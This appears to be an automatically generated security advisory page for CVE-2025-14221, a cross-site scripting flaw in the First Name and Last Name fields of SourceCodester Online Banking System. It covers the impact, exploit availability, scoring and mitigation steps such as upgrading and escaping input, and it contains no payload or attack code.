Platform
php
Component
online-banking-system
Fixed in
1.0.1
A cross-site scripting (XSS) vulnerability has been identified in SourceCodester Online Banking System versions 1.0 through 1.0. This flaw resides within the /?page=user file and can be triggered by manipulating the First Name/Last Name parameters. Successful exploitation allows an attacker to inject malicious scripts, potentially compromising user sessions and data. A patch is available in version 1.0.1.
The XSS vulnerability in SourceCodester Online Banking System allows an attacker to inject arbitrary JavaScript code into the application. This code can then be executed in the context of a user's browser, potentially leading to session hijacking, account takeover, and the theft of sensitive information like login credentials and financial data. An attacker could also redirect users to malicious websites or deface the online banking interface. Given the nature of online banking systems, the potential impact is significant, as attackers could gain access to substantial financial resources and sensitive personal data.
This vulnerability is publicly known and an exploit is available, increasing the risk of immediate exploitation. It has been added to the NVD database on 2025-12-08. The LOW CVSS score reflects the limited attack complexity and potential impact, but the public availability of an exploit warrants immediate attention.
Exploit Status
EPSS
0.04% (11% percentile)
CISA SSVC
CVSS Vector
The primary mitigation for CVE-2025-14221 is to immediately upgrade to version 1.0.1 of SourceCodester Online Banking System. If upgrading is not immediately feasible, consider implementing input validation and sanitization on the First Name/Last Name fields to prevent malicious code from being injected. Web application firewalls (WAFs) configured to detect and block XSS payloads can also provide a temporary layer of protection. Regularly review and update security rulesets to ensure they are effective against emerging threats.
Update the Online Banking System to a patched version or discontinue its use. Implement input validation and sanitization in the 'First Name' and 'Last Name' fields to prevent the injection of malicious code. Consider using an HTML escaping function to display the data.
Vulnerability analysis and critical alerts directly to your inbox.
CVE-2025-14221 is a cross-site scripting (XSS) vulnerability affecting SourceCodester Online Banking System versions 1.0–1.0, allowing attackers to inject malicious scripts via the /?page=user file.
You are affected if you are using SourceCodester Online Banking System versions 1.0–1.0. Upgrade to version 1.0.1 to mitigate the risk.
The recommended fix is to upgrade to version 1.0.1. As a temporary workaround, implement input validation and sanitization on the First Name/Last Name fields.
Yes, an exploit for CVE-2025-14221 is publicly available, indicating a potential for active exploitation.
Refer to the SourceCodester website or their official communication channels for the advisory regarding CVE-2025-14221.
Upload your dependency file and we'll tell you instantly if this and other CVEs hit you.